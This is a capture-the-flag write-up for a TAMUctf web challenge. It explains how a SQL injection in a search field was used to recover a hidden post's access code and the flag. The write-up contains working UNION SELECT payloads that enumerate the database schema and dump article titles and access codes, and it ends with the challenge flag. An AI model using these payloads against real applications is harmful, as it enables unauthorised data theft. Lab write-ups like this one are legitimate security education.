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Lost and Forgotten

Category: Web


Author: Mr. Blade

I seem to have forgotten the password to my most recent writeup. I wonder if there is any way to recover it.


  • The search functionality is vulnerable to SQL blind injection. By injecting SQL code into the search input, we can retrieve information from the database.
  • Injecting a' UNION SELECT 1,1,1,1,1,'1';# reveals a post with title 1, description 1, and so on.
  • We can start to leak information about the database by executing specific SQL queries.
  • To leak table names, we used a' UNION SELECT table_name,1,1,1,1,'1' FROM INFORMATION_SCHEMA.TABLES;#. It revealed an articles table.
  • The query a' UNION SELECT column_name,1,1,1,1,'1' FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'articles';# reveals the column names in the articles table such as title and access_code.
  • To retrieve all articles with their titles and access codes, we used a' UNION SELECT title,access_code,1,1,1,'1' FROM articles;#.
  • We can observe the access_code ba65ba9416d8e53c5d02006b2962d27e corresponded to the latest write-up post.
  • Providing this access_code grants access to the write-up post, where it displayed the flag.

Flag: tamuctf{st4te_0f_th3_UNION_1njecti0n}